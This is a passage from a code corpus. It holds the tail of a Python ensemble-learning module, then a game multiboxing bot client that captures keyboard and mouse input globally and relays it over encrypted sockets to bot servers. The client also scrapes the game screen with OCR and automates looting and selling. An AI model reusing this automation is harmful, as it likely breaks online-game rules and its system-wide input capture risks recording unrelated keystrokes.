    ensemble_transform = ensemble_transform
    _get_estimators_pred_chunks = _get_estimators_pred_chunks

    @property
    def feature_importances_(self):
        # Loader case: concatenate per-estimator importances; otherwise
        # average them across estimators.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'feature_importances_')

        return get_mean_fis(self.estimators_, 'feature_importances_')

    @property
    def coef_(self):
        # Loader case: concatenate per-estimator coefs; otherwise average.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'coef_')

        return get_mean_fis(self.estimators_, 'coef_')

    def predict(self, X):

        # Make sure fitted
        check_is_fitted(self)

        # Base case is when number of features stays the same as expected.
        if X.shape[-1] == self.n_features_in_:
            return super().predict(X)

        # Otherwise, two cases, nested loader or not
        if self.has_nested_loader():

            # If nested loader, then the expectation is that this
            # predict is receiving the concat fully model nested transformed
            # output from each of the self.estimators_
            pred_chunks = self._get_estimators_pred_chunks(X, method='predict')

            # The voting ensemble just uses the mean from each
            mean_preds = np.mean(pred_chunks, axis=0)

            return mean_preds

        # TODO fill in other case?
        raise RuntimeError('Not Implemented')

    def transform(self, X, nested_model=False):
        # Not nested, base case transform
        if not nested_model:
            return super().transform(X)

        return self.ensemble_transform(X)
class BPtVotingClassifier(VotingClassifier):
    """VotingClassifier extended with BPt mapping / fit-index support and
    a nested-loader prediction path."""

    # Flags telling the BPt pipeline which extra fit arguments to pass.
    _needs_mapping = True
    _needs_fit_index = True

    # `fit` wraps the voting fit with label encoding (classifier case).
    _fit_all_estimators = _fit_all_estimators
    bpt_fit = voting_fit
    fit = ensemble_classifier_fit

    has_nested_loader = has_nested_loader
    transform_feat_names = _transform_feat_names
    _base_transform_feat_names = _base_transform_feat_names
    _loader_transform_feat_names = _loader_transform_feat_names

    _get_fis_lens = _get_fis_lens
    inverse_transform_fis = voting_inverse_transform_fis
    base_inverse_transform_fis = base_inverse_transform_fis
    ensemble_transform = ensemble_transform
    _get_estimators_pred_chunks = _get_estimators_pred_chunks

    @property
    def feature_importances_(self):
        # Loader case: concatenate per-estimator importances; otherwise
        # average them across estimators.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'feature_importances_')

        return get_mean_fis(self.estimators_, 'feature_importances_')

    @property
    def coef_(self):
        # Loader case: concatenate per-estimator coefs; otherwise average.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'coef_')

        return get_mean_fis(self.estimators_, 'coef_')

    def _check_voting(self):
        # Guard used by @available_if: predict_proba only exists for
        # soft voting.
        if self.voting == "hard":
            raise AttributeError(
                f"predict_proba is not available when voting={repr(self.voting)}"
            )
        return True

    def predict(self, X):

        # Make sure fitted
        check_is_fitted(self)

        # Base case is when number of features stays the same as expected.
        if X.shape[-1] == self.n_features_in_:
            return super().predict(X)

        # If loader based
        if self.has_nested_loader():

            # If nested loader, then the expectation is that this
            # predict is receiving the concat fully model nested transformed
            # output from each of the self.estimators_

            # If soft voting, can use predict proba instead
            if self.voting == "soft":
                maj = np.argmax(self.predict_proba(X), axis=1)

            # Hard voting, use base pred
            else:

                # Get predictions with special nested
                predictions = self._get_estimators_pred_chunks(X, method='predict')

                # Get majority vote w/
                # NOTE(review): axis=1 applies the vote along the second
                # axis of the (n_estimators, n_samples) prediction array;
                # sklearn's own hard vote operates on the transposed
                # array -- verify this axis is intended.
                maj = np.apply_along_axis(
                    lambda x: np.argmax(np.bincount(x, weights=self._weights_not_none)),
                    axis=1,
                    arr=predictions,
                )

            # Use label encoder to inverse transform before returning
            maj = self.le_.inverse_transform(maj)

            return maj

        # TODO fill in other case?
        raise RuntimeError('Not Implemented')

    def transform(self, X, nested_model=False):
        # Not nested, base case transform
        if not nested_model:
            return super().transform(X)

        return self.ensemble_transform(X)

    @available_if(_check_voting)
    def predict_proba(self, X):

        check_is_fitted(self)

        # Base case is when number of features stays the same as expected.
        if X.shape[-1] == self.n_features_in_:
            return super().predict_proba(X)

        # Otherwise, two cases, nested loader or not
        if self.has_nested_loader():

            # Get predict probas from each
            predict_probas = self._get_estimators_pred_chunks(X, method='predict_proba')

            # Calculate average
            avg = np.average(predict_probas, axis=0, weights=self._weights_not_none)

            # And return
            return avg

        # TODO fill in other case?
        raise RuntimeError('Not Implemented')
class EnsembleWrapper():
    """Wrap one or more (name, model) tuples into sklearn-style ensemble
    objects, keeping ``model_params`` / ``ensemble_params`` key names in
    sync with the pipeline-style ``wrapper_name__param`` prefixes that
    each level of wrapping introduces.
    """
    def __init__(self, model_params, ensemble_params,
                 _get_ensembler, n_jobs, random_state):
        # model_params / ensemble_params: dicts of hyper-parameters whose
        # keys are re-prefixed in place as models get wrapped.
        # _get_ensembler: callable that builds a default (voting-style)
        # ensemble object from a list of (name, model) tuples.
        self.model_params = model_params
        self.ensemble_params = ensemble_params
        self._get_ensembler = _get_ensembler
        self.n_jobs = n_jobs
        self.random_state = random_state
    def _update_params(self, p_name, to_add):
        """Prefix every key of the dict attribute ``p_name`` with
        ``to_add + '__'`` (sklearn nested-parameter convention)."""
        # Get existing
        params = getattr(self, p_name)
        # Fill in new
        new_params = {}
        for key in params:
            new_params[to_add + '__' + key] = params[key]
        # Update
        setattr(self, p_name, new_params)
    def _update_model_ensemble_params(self, to_add, model=True, ensemble=True):
        """Apply the ``to_add`` name prefix to the model and/or ensemble
        parameter dicts."""
        if model:
            self._update_params('model_params', to_add)
        if ensemble:
            self._update_params('ensemble_params', to_add)
    def _basic_ensemble(self, models, name, ensemble=False):
        """Return ``models`` untouched if it holds a single entry,
        otherwise wrap them all in the default ensembler under ``name``
        (re-prefixing the stored params to match)."""
        if len(models) == 1:
            return models
        else:
            basic_ensemble = self._get_ensembler(models)
            # Params must now be addressed through the new wrapper level.
            self._update_model_ensemble_params(name, ensemble=ensemble)
            return [(name, basic_ensemble)]
    def get_updated_params(self):
        """Merge ensemble params into model params and return the result.

        NOTE(review): mutates ``self.model_params`` in place; callers get
        the same dict object back.
        """
        self.model_params.update(self.ensemble_params)
        return self.model_params
    def wrap_ensemble(self, models, ensemble, ensemble_params,
                      final_estimator=None,
                      final_estimator_params=None):
        """Dispatch to the right wrapping strategy for ``models``.

        Returns a list with a single (name, wrapped_model) tuple (or the
        original single-model list when no wrapping is needed).
        """
        # If no ensemble is passed, return either the 1 model,
        # or a voting wrapper
        if ensemble is None or len(ensemble) == 0:
            return self._basic_ensemble(models=models,
                                        name='Default Voting',
                                        ensemble=True)
        # Otherwise special ensembles
        else:
            # If needs a single estimator, but multiple models passed,
            # wrap in ensemble!
            if ensemble_params.single_estimator:
                se_ensemb_name = 'Single-Estimator Compatible Ensemble'
                models = self._basic_ensemble(models,
                                              se_ensemb_name,
                                              ensemble=False)
            # If no split and single estimator
            if ensemble_params.single_estimator:
                return self._wrap_single(models, ensemble,
                                         ensemble_params.n_jobs_type)
            # Last case is, no split/DES ensemble and also
            # not single estimator based
            # e.g., in case of stacking regressor.
            else:
                return self._wrap_multiple(models, ensemble,
                                           final_estimator,
                                           final_estimator_params,
                                           ensemble_params.n_jobs_type,
                                           ensemble_params.cv)
    def _wrap_single(self, models, ensemble_info, n_jobs_type):
        '''If passed single_estimator flag: wrap the one base model in
        an ensemble that takes a ``base_estimator`` argument (e.g.
        bagging), propagating n_jobs and random_state.'''
        # Unpack ensemble info
        ensemble_name = ensemble_info[0]
        ensemble_obj = ensemble_info[1][0]
        ensemble_extra_params = ensemble_info[1][1]
        # Models here since single estimator is assumed
        # to be just a list with
        # of one tuple as
        # [(model or ensemble name, model or ensemble)]
        base_estimator = models[0][1]
        # Set n jobs based on passed type
        if n_jobs_type == 'ensemble':
            model_n_jobs = 1
            ensemble_n_jobs = self.n_jobs
        else:
            model_n_jobs = self.n_jobs
            ensemble_n_jobs = 1
        # Set model / base_estimator n_jobs
        set_n_jobs(base_estimator, model_n_jobs)
        # Make sure random_state is set (should be already)
        if hasattr(base_estimator, 'random_state'):
            setattr(base_estimator, 'random_state', self.random_state)
        # Create the ensemble object
        ensemble = ensemble_obj(base_estimator=base_estimator,
                                **ensemble_extra_params)
        # Set ensemble n_jobs
        set_n_jobs(ensemble, ensemble_n_jobs)
        # Set random state
        if hasattr(ensemble, 'random_state'):
            setattr(ensemble, 'random_state', self.random_state)
        # Wrap as object
        new_ensemble = [(ensemble_name, ensemble)]
        # Have to change model name to base_estimator
        self.model_params =\
            replace_with_in_params(self.model_params, models[0][0],
                                   'base_estimator')
        # Append ensemble name to all model params
        self._update_model_ensemble_params(ensemble_name,
                                           ensemble=False)
        return new_ensemble
    def _wrap_multiple(self, models, ensemble_info,
                       final_estimator, final_estimator_params,
                       n_jobs_type, cv):
        '''In case of no split/DES ensemble, and not single estimator based.
        Builds an ``estimators=``-style ensemble (e.g. stacking),
        optionally with a final_estimator and cv.'''
        # Unpack ensemble info
        ensemble_name = ensemble_info[0]
        ensemble_obj = ensemble_info[1][0]
        ensemble_extra_params = ensemble_info[1][1]
        # Models here just self.models a list of tuple of
        # all models.
        # So, ensemble_extra_params should contain the
        # final estimator + other params
        # Set model_n_jobs and ensemble n_jobs based on type
        if n_jobs_type == 'ensemble':
            model_n_jobs = 1
            ensemble_n_jobs = self.n_jobs
        else:
            model_n_jobs = self.n_jobs
            ensemble_n_jobs = 1
        # Set the model jobs
        set_n_jobs(models, model_n_jobs)
        # Make sure random state is propegated
        for model in models:
            if hasattr(model[1], 'random_state'):
                setattr(model[1], 'random_state', self.random_state)
        # Determine the parameters to init the ensemble
        pass_params = ensemble_extra_params
        pass_params['estimators'] = models
        # Process final_estimator if passed
        if final_estimator is not None:
            # Replace name of final estimator w/ final_estimator in params
            final_estimator_params =\
                replace_with_in_params(params=final_estimator_params,
                                       original=final_estimator[0][0],
                                       replace='final_estimator')
            # Add final estimator params to model_params - once name changed
            # to avoid potential overlap.
            self.model_params.update(final_estimator_params)
            # Unpack actual model obj
            final_estimator_obj = final_estimator[0][1]
            # Set final estimator n_jobs to model n_jobs
            set_n_jobs(final_estimator_obj, model_n_jobs)
            # Redundant random state check
            if hasattr(final_estimator_obj, 'random_state'):
                setattr(final_estimator_obj, 'random_state', self.random_state)
            # Add to pass params
            pass_params['final_estimator'] = final_estimator_obj
        # Check if cv passed
        if cv is not None:
            pass_params['cv'] = cv
        # Init the ensemble object
        ensemble = ensemble_obj(**pass_params)
        # Set ensemble n_jobs
        set_n_jobs(ensemble, ensemble_n_jobs)
        # Set random state
        if hasattr(ensemble, 'random_state'):
            setattr(ensemble, 'random_state', self.random_state)
        # Wrap as pipeline compatible object
        new_ensemble = [(ensemble_name, ensemble)]
        # Append ensemble name to all model params
        self._update_model_ensemble_params(ensemble_name,
                                           ensemble=False)
        return new_ensemble
| 1.882813 | 2 |
v10b/client.py | gavinIRL/RHBotArray | 0 | 12772918 | <reponame>gavinIRL/RHBotArray
import socket
import select
import errno
import sys
from win32gui import GetWindowText, GetForegroundWindow
from win32api import GetSystemMetrics
from windowcapture import WindowCapture
import ctypes
from pynput.keyboard import Key, Listener, KeyCode
from pynput import mouse, keyboard
from random import randint, random, uniform
import subprocess
import threading
import time
import os
from cryptography.fernet import Fernet
from quest_handle import QuestHandle
from sell_repair import SellRepair
from hsvfilter import grab_object_preset, HsvFilter
from vision import Vision
import cv2
import pytesseract
from fuzzywuzzy import process
import pydirectinput
import numpy as np
os.chdir(os.path.dirname(os.path.abspath(__file__)))
class RHBotClientConnection():
    """One encrypted control connection from the admin client to a bot server.

    Messages are Fernet-encrypted and framed with a fixed-width length
    header (``HEADER_LENGTH`` left-justified decimal byte count).
    """
    def __init__(self, ip, delay=0) -> None:
        """Connect to the server at ``ip`` and register as ``Admin``.

        delay -- optional per-connection send delay in seconds; when > 0,
        every message is dispatched from a timer thread instead of at once.
        """
        self.delay = delay
        self.HEADER_LENGTH = 10
        self.IP = ip
        self.PORT = 1351
        self.my_username = "Admin"
        self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.client_socket.connect((self.IP, self.PORT))
        self.client_socket.setblocking(False)
        # The username handshake is sent in the clear (matches server side).
        username = self.my_username.encode('utf-8')
        username_header = f"{len(username):<{self.HEADER_LENGTH}}".encode(
            'utf-8')
        self.client_socket.send(username_header + username)
        # Symmetric key shared with the servers via the key.key file.
        with open("key.key") as f:
            key = f.read()
        self.fern = Fernet(key)

    def _frame(self, message):
        """Encrypt ``message`` (str) and prepend the length header."""
        payload = self.fern.encrypt(message.encode('utf-8'))
        header = f"{len(payload):<{self.HEADER_LENGTH}}".encode('utf-8')
        return header + payload

    def send_message(self, message):
        """Send ``message`` immediately, or via the delay path if configured."""
        if self.delay > 0:
            self.send_message_delayed(message, self.delay)
        else:
            self.client_socket.send(self._frame(message))

    def send_message_delayed(self, message, delay):
        """Send ``message`` roughly ``delay`` seconds from now (non-blocking)."""
        start_time = time.time()
        t = threading.Thread(target=self.delay_thread,
                             args=(message, delay, start_time))
        t.start()

    def delay_thread(self, message, delay, start_time):
        """Worker: wait out the remaining delay, then send the framed message."""
        framed = self._frame(message)
        # Clamp to zero: if encryption/scheduling took longer than the
        # delay, a negative argument would make time.sleep() raise
        # ValueError and silently kill this thread.
        time.sleep(max(0.0, delay - (time.time() - start_time)))
        self.client_socket.send(framed)

    def main_loop(self):
        """Keep the per-connection thread alive (no periodic work yet)."""
        while True:
            time.sleep(0.5)
class ClientKeypressListener():
    """Captures local mouse/keyboard input and relays it to every connected
    bot server, either live or as timed batches, with client-side helpers
    for auto-loot, map OCR and coordinate scaling of the game window."""
    def __init__(self, list_servers, test=False, delay_spacing=12) -> None:
        # list_servers: RHBotClientConnection instances to broadcast to.
        # test: use the *_test input handlers (no game window required).
        # delay_spacing: base seconds used to stagger batch sends.
        self.test = test
        self.list_servers = list_servers
        self.listener = None
        self.unreleased_keys = []
        # Hotkey handling
        self.transmitting = True
        self.single_server = None
        self.delay_spacing = delay_spacing
        self.x_loot_only = True
        self.autoloot_enabled = False
        self.quest_handle = QuestHandle()
        self.quest_handle_clicks = 0
        self.scaling = ClientUtils.get_monitor_scaling()
        # print("Scaling={}".format(self.scaling))
        with open("gamename.txt") as f:
            self.gamename = f.readline()
        if not self.test:
            self.game_wincap = WindowCapture(self.gamename)
        # These are for batch recording and sending
        self.batch_recording_ongoing = False
        self.batch_start_time = 0
        self.batch = ""
        self.delay_spread = []
        self.create_random_delays()
        # These are for the sell and repair logic
        self.sell_repair = SellRepair(last_row_protect=True)
        self.selling_ongoing = 0
        # These are for allowing x in all cases
        self.xallow = False
        # These are for the v2 regroup command
        self.map_rect = None
        self.level_name = None
        self.speed = 20
        self.rects = {}
        self.speeds = {}
        self.num_names = []
        self.load_level_rects()
        self.player_pos = None
        # Input mode, true = pag, false = custom
        self.inputmode = False
        # Autoloot support client-side
        self.xprompt_filter, xprompt_custom_rect = grab_object_preset(
            object_name="prompt_press_x_pickup")
        self.xprompt_wincap = WindowCapture(
            self.gamename, xprompt_custom_rect)
        self.xprompt_vision = Vision("xprompt67filtv2.jpg")
    def try_toggle_map(self):
        """Toggle the in-game map by clicking its screen button.

        Coordinates are hard-coded window-relative pixels scaled by the
        monitor DPI factor.
        """
        # print("Toggling map")
        # time.sleep(0.1)
        # pydirectinput.keyDown("m")
        # time.sleep(0.18)
        # pydirectinput.keyUp("m")
        # time.sleep(0.08)
        pydirectinput.click(
            int(self.scaling*1262+self.game_wincap.window_rect[0]), int(self.scaling*64+self.game_wincap.window_rect[1]))
        # print("Finished toggling map")
    def close_map(self):
        """Click the map close button (hard-coded scaled coordinates)."""
        pydirectinput.click(
            int(self.scaling*859+self.game_wincap.window_rect[0]), int(self.scaling*260+self.game_wincap.window_rect[1]))
    def string_to_rect(self, string: str):
        """Parse a comma-separated rect string like 'x1,y1,x2,y2' to ints."""
        return [int(i) for i in string.split(',')]
    def load_level_rects(self):
        """Populate self.rects and self.speeds from the level data files.

        Also registers OCR-misread aliases of each level name ('1'->'L',
        'ri'->'n') so fuzzy lookups still hit.
        """
        # Load the translation from name to num
        with open("lvl_name_num.txt") as f:
            self.num_names = f.readlines()
        for i, entry in enumerate(self.num_names):
            self.num_names[i] = entry.split("-")
        # Load the num to rect catalogue
        with open("catalogue.txt") as f:
            nums_rects = f.readlines()
        for i, entry in enumerate(nums_rects):
            nums_rects[i] = entry.split("-")
        # Finally load the level speeds
        with open("lvl_speed.txt") as f:
            num_speeds = f.readlines()
        for i, entry in enumerate(num_speeds):
            num_speeds[i] = entry.split("|")
        # Then add each rect to the rects dict against name
        # Also add each speed to the speed dict against name
        for number, name in self.num_names:
            for num, area, rect in nums_rects:
                if area == "FM" and num == number:
                    self.rects[name.rstrip().replace(" ", "")] = rect.rstrip()
                    if "1" in name:
                        self.rects[name.rstrip().replace(
                            " ", "").replace("1", "L")] = rect.rstrip()
                    if "ri" in name:
                        self.rects[name.rstrip().replace(
                            " ", "").replace("ri", "n").replace("1", "L")] = rect.rstrip()
                    break
            for num, speed in num_speeds:
                if num == number:
                    self.speeds[name.rstrip().replace(
                        " ", "")] = float(speed.rstrip())
                    if "1" in name:
                        self.speeds[name.rstrip().replace(
                            " ", "").replace("1", "L")] = float(speed.rstrip())
                    if "ri" in name:
                        self.speeds[name.rstrip().replace(
                            " ", "").replace("ri", "n").replace("1", "L")] = float(speed.rstrip())
                    break
    def detect_name(self):
        """OCR the player-name area of the game window and return the
        longest text fragment found.

        NOTE(review): if OCR finds no text, ``name`` is never bound and
        this raises NameError — confirm upstream always has text here.
        """
        plyrname_rect = [165, 45, 320, 65]
        plyrname_wincap = WindowCapture(self.gamename, plyrname_rect)
        plyrname_filt = HsvFilter(0, 0, 103, 89, 104, 255, 0, 0, 0, 0)
        plyrmname_vision = Vision('xprompt67filtv2.jpg')
        # get an updated image of the game
        image = plyrname_wincap.get_screenshot()
        # pre-process the image
        image = plyrmname_vision.apply_hsv_filter(
            image, plyrname_filt)
        rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        results = pytesseract.image_to_data(
            rgb, output_type=pytesseract.Output.DICT, lang='eng')
        biggest = 0
        for entry in results["text"]:
            if len(entry) > biggest:
                name = entry
                biggest = len(entry)
        return name
    def start_mouse_listener(self):
        """Start the pynput mouse listener (test or live handler)."""
        if not self.test:
            self.mouse_listener = mouse.Listener(
                on_click=self.on_click)
        else:
            self.mouse_listener = mouse.Listener(
                on_click=self.on_click_test)
        self.mouse_listener.start()
    def on_click(self, x, y, button, pressed):
        """Live mouse handler: forward click-release positions (as window
        ratios) to the servers, or append them to the current batch."""
        if self.selling_ongoing != 0:
            # Swallow clicks for ~4 s while the sell/repair flow runs.
            if self.selling_ongoing < time.time() - 4:
                self.selling_ongoing = 0
        elif self.quest_handle_clicks > 0:
            # Clicks generated by the quest handler itself — don't relay.
            self.quest_handle_clicks -= 1
        # First off need to check if transmitting is enabled
        elif self.transmitting:
            # Need to then check if the click was in the right window
            # Do this by checking if window focused
            if GetWindowText(GetForegroundWindow()) == self.gamename:
                # when pressed is False, that means it's a release event.
                # let's listen only to mouse click releases
                if not pressed:
                    # Need to get the ratio compared to window top left
                    # This will allow common usage on other size monitors
                    # print("x={}, y={}".format(x, y))
                    xratio, yratio = self.convert_click_to_ratio(x, y)
                    # print("xrat={}, yrat={}".format(xratio, yratio))
                    if self.batch_recording_ongoing:
                        self.batch += str(button) + "|click|" + \
                            "{:.3f}".format((time.time() - self.batch_start_time)) + \
                            "|"+"{:.5f},{:.5f}\n".format(xratio, yratio)
                    else:
                        for server in self.list_servers:
                            server.send_message(
                                str(button) + ","+str(xratio)+"|"+str(yratio))
    def start_keypress_listener(self):
        """Start the pynput keyboard listener once (test or live handler)."""
        if self.listener == None:
            if not self.test:
                self.listener = Listener(on_press=self.on_press,
                                         on_release=self.on_release)
            else:
                self.listener = Listener(on_press=self.on_press_test,
                                         on_release=self.on_release_test)
            self.listener.start()
    def on_press(self, key):
        """Live key handler: digits 0-9 and '-' are control hotkeys;
        everything else is relayed (or batch-recorded) as a key-down."""
        if self.selling_ongoing != 0:
            # Ignore keys for ~4 s while sell/repair automation runs.
            if self.selling_ongoing < time.time() - 4:
                self.selling_ongoing = 0
        elif key == KeyCode(char='0'):
            # '0' = hard exit: tell every server to quit, then kill client.
            print("Exiting bot")
            for server in self.list_servers:
                server.delay = 0
                server.send_message("quit,1")
            os._exit(1)
        elif self.transmitting:
            if key == KeyCode(char='1'):
                self.transmitting = False
                print("TRANSMIT OFF")
            elif key == KeyCode(char='2'):
                # '2' toggles batch recording; on stop, flush per server.
                self.batch_recording_ongoing = not self.batch_recording_ongoing
                if self.batch_recording_ongoing:
                    print("Starting batch record")
                    self.batch_start_time = time.time()
                else:
                    # todo - create threads to send the batches
                    for i, server in enumerate(self.list_servers):
                        t = threading.Thread(
                            target=self.send_batch, args=(server, self.batch, i))
                        t.start()
                    print("Ending batch record")
                    self.batch = ""
            elif key == KeyCode(char='3'):
                for server in self.list_servers:
                    server.send_message("revive,1")
                print("Reviving...")
            elif key == KeyCode(char='4'):
                # '4' toggles server-side input backend (PAG vs custom).
                self.inputmode = not self.inputmode
                for server in self.list_servers:
                    if self.inputmode:
                        server.send_message("inputmode,1")
                    else:
                        server.send_message("inputmode,0")
                if self.inputmode:
                    print("Swapping to PAG")
                else:
                    print("Swapping to Custom")
            elif key == KeyCode(char='5'):
                # '5' = regroup: locate self on the map, broadcast position.
                try:
                    x, y = self.find_player()
                    for server in self.list_servers:
                        server.send_message("regroup,{}|{}".format(x, y))
                    print("Regrouping...")
                    time.sleep(0.01)
                    self.close_map()
                except:
                    print("Unable to find player right now")
            elif key == KeyCode(char='6'):
                self.autoloot_enabled = not self.autoloot_enabled
                if self.autoloot_enabled:
                    for server in self.list_servers:
                        server.send_message("autoloot,on")
                    print("AUTOLOOT ON")
                else:
                    for server in self.list_servers:
                        server.send_message("autoloot,off")
                    print("AUTOLOOT OFF")
            elif key == KeyCode(char='7'):
                # '7' = sell & repair locally and on all servers.
                self.selling_ongoing = time.time()
                for server in self.list_servers:
                    server.send_message("sellrepair,1")
                print("Selling and repairing...")
                os.popen('python sell_repair.py')
                # self.sell_repair.ident_sell_repair()
            elif key == KeyCode(char='8'):
                # '8' = run the quest-handling automation (click suppressed).
                self.quest_handle_clicks += 1
                if not self.batch_recording_ongoing:
                    for server in self.list_servers:
                        server.send_message("questhandle,1")
                else:
                    self.batch += str(key) + "|questhandle|" + \
                        "{:.3f}".format(
                            (time.time() - self.batch_start_time)) + "|0,0\n"
                self.quest_handle.start_quest_handle()
            elif key == KeyCode(char='9'):
                self.xallow = not self.xallow
                if self.xallow:
                    for server in self.list_servers:
                        server.send_message("xallow,1")
                    print("XALLOW ON")
                else:
                    for server in self.list_servers:
                        server.send_message("xallow,0")
                    print("XALLOW OFF")
            elif key == KeyCode(char='-'):
                for server in self.list_servers:
                    server.send_message("clearall,1")
                print("Clearing All...")
            elif self.autoloot_enabled and key == KeyCode(char='x'):
                # 'x' is owned by the autoloot thread while it is active.
                pass
            elif GetWindowText(GetForegroundWindow()) == self.gamename:
                # Ordinary key: relay key-down once until it is released.
                if str(key) not in self.unreleased_keys:
                    if not self.batch_recording_ongoing:
                        for server in self.list_servers:
                            server.send_message(str(key)+",down")
                        self.unreleased_keys.append(str(key))
                    else:
                        self.batch += str(key) + "|keyDown|" + \
                            "{:.3f}".format(
                                (time.time() - self.batch_start_time)) + "|0,0\n"
                        self.unreleased_keys.append(str(key))
        elif key == KeyCode(char='1'):
            # '1' while muted re-enables transmit and flushes any batch.
            self.transmitting = True
            if self.batch_recording_ongoing:
                for i, server in enumerate(self.list_servers):
                    t = threading.Thread(
                        target=self.send_batch, args=(server, self.batch, i))
                    t.start()
                self.batch_recording_ongoing = False
            print("TRANSMIT ON")
    def auto_loot(self):
        """Loop while autoloot is on: hold/tap 'x' when a pickup prompt
        is visible, backing off after several consecutive presses."""
        consec_xpress = 0
        while self.autoloot_enabled:
            if self.loot_if_available():
                consec_xpress += 1
                if not consec_xpress > 6:
                    time.sleep(0.01)
                    pydirectinput.keyUp("x")
                    # self.release_key(self.key_map["x"])
                    time.sleep(0.15)
                else:
                    time.sleep(0.4)
            else:
                time.sleep(0.1)
                consec_xpress = 0
    def autoloot_thread_start(self):
        """Enable autoloot and run auto_loot() on a daemon thread."""
        t = threading.Thread(target=self.auto_loot, daemon=True)
        self.autoloot_enabled = True
        t.start()
    def loot_if_available(self):
        """Press 'x' if the pickup prompt is detected on screen.

        Returns True when the prompt was found (key-up happens in the
        auto_loot loop); returns None otherwise.
        """
        # get an updated image of the game at specified area
        xprompt_screenshot = self.xprompt_wincap.get_screenshot()
        # pre-process the image to help with detection
        xprompt_output_image = self.xprompt_vision.apply_hsv_filter(
            xprompt_screenshot, self.xprompt_filter)
        # do object detection, this time grab rectangles
        xprompt_rectangles = self.xprompt_vision.find(
            xprompt_output_image, threshold=0.61, epsilon=0.5)
        # then return answer to whether currently in dungeon
        if len(xprompt_rectangles) == 1:
            # self.press_key(self.key_map["x"])
            pydirectinput.keyDown("x")
            # keyup performed in main loop
            # return True for autoloot
            return True
    def find_player(self):
        """Work out the current level, open the big map if needed, and
        return the player's (x, y) position on it."""
        self.level_name = self.detect_level_name()
        # Then grab the right rect for the level
        try:
            self.map_rect = self.string_to_rect(self.rects[self.level_name])
            self.speed = self.speeds[self.level_name]
        except:
            # OCR miss: fall back to fuzzy match, then to a default rect.
            try:
                best_match = process.extractOne(
                    self.level_name, self.rects, score_cutoff=0.8)
                self.map_rect = self.string_to_rect(
                    self.rects[best_match])
                self.speed = self.speeds[best_match]
            except:
                self.map_rect = [362, 243, 1105, 748]
                self.speed = 30
        # Then open the map
        if not self.detect_bigmap_open():
            self.try_toggle_map()
        return self.grab_player_pos()
    def grab_player_pos(self):
        """Template-match the player marker inside the map rect.

        Returns screen-absolute (x, y), or False if no marker was found.
        """
        if not self.map_rect:
            wincap = WindowCapture(self.gamename)
        else:
            wincap = WindowCapture(self.gamename, self.map_rect)
        filter = HsvFilter(34, 160, 122, 50, 255, 255, 0, 0, 0, 0)
        image = wincap.get_screenshot()
        save_image = self.filter_blackwhite_invert(filter, image)
        # cv2.imwrite("testy3.jpg", save_image)
        vision_limestone = Vision('plyr.jpg')
        rectangles = vision_limestone.find(
            save_image, threshold=0.31, epsilon=0.5)
        points = vision_limestone.get_click_points(rectangles)
        try:
            x, y = points[0]
            if not self.map_rect:
                return x, y
            else:
                # Convert rect-relative match back to absolute coords.
                x += self.map_rect[0]
                y += self.map_rect[1]
                return x, y
        except:
            return False
    def on_release(self, key):
        """Live key-release handler: hotkeys are ignored; other keys are
        relayed (or batch-recorded) as key-up events."""
        if key == KeyCode(char='1'):
            pass
        elif key == KeyCode(char='2'):
            pass
        elif key == KeyCode(char='3'):
            pass
        elif key == KeyCode(char='4'):
            pass
        elif key == KeyCode(char='5'):
            pass
        elif key == KeyCode(char='6'):
            pass
        elif key == KeyCode(char='7'):
            pass
        elif key == KeyCode(char='8'):
            pass
        elif key == KeyCode(char='9'):
            pass
        elif self.autoloot_enabled and key == KeyCode(char='x'):
            pass
        elif self.transmitting:
            if GetWindowText(GetForegroundWindow()) == self.gamename:
                if not self.batch_recording_ongoing:
                    for server in self.list_servers:
                        server.send_message(str(key)+",up")
                else:
                    self.batch += str(key) + "|keyUp|" + \
                        "{:.3f}".format(
                            (time.time() - self.batch_start_time)) + "|0,0\n"
                try:
                    self.unreleased_keys.remove(str(key))
                except:
                    pass
                if len(self.batch) > 2500:
                    # need to first check if there are still keys pressed down
                    if len(self.unreleased_keys) == 0:
                        # NOTE(review): the oversized batch is discarded
                        # here without being sent — confirm intended.
                        print("Sending batch now due to size")
                        self.batch_start_time = time.time()
                        # print(self.batch)
                        self.batch = ""
    def filter_blackwhite_invert(self, filter, existing_image):
        """Apply the HSV filter, threshold to black & white, and invert.

        Returns a 3-channel BGR image suitable for template matching.
        """
        hsv = cv2.cvtColor(existing_image, cv2.COLOR_BGR2HSV)
        hsv_filter = filter
        # add/subtract saturation and value
        h, s, v = cv2.split(hsv)
        s = self.shift_channel(s, hsv_filter.sAdd)
        s = self.shift_channel(s, -hsv_filter.sSub)
        v = self.shift_channel(v, hsv_filter.vAdd)
        v = self.shift_channel(v, -hsv_filter.vSub)
        hsv = cv2.merge([h, s, v])
        # Set minimum and maximum HSV values to display
        lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
        upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
        # Apply the thresholds
        mask = cv2.inRange(hsv, lower, upper)
        result = cv2.bitwise_and(hsv, hsv, mask=mask)
        # convert back to BGR
        img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
        # now change it to greyscale
        grayImage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        # now change it to black and white
        (thresh, blackAndWhiteImage) = cv2.threshold(
            grayImage, 67, 255, cv2.THRESH_BINARY)
        # now invert it
        inverted = (255-blackAndWhiteImage)
        inverted = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
        return inverted
    def shift_channel(self, c, amount):
        """Shift a uint8 channel by ``amount``, saturating at 0/255."""
        if amount > 0:
            lim = 255 - amount
            c[c >= lim] = 255
            c[c < lim] += amount
        elif amount < 0:
            amount = -amount
            lim = amount
            c[c <= lim] = 0
            c[c > lim] -= amount
        return c
    def detect_level_name(self):
        """OCR the level-name strip at the top-right of the game window."""
        wincap = WindowCapture(self.gamename, [1121, 31, 1248, 44])
        existing_image = wincap.get_screenshot()
        filter = HsvFilter(0, 0, 0, 169, 34, 255, 0, 0, 0, 0)
        vision_limestone = Vision('plyr.jpg')
        # cv2.imwrite("testy2.jpg", existing_image)
        save_image = vision_limestone.apply_hsv_filter(existing_image, filter)
        # cv2.imwrite("testy3.jpg", save_image)
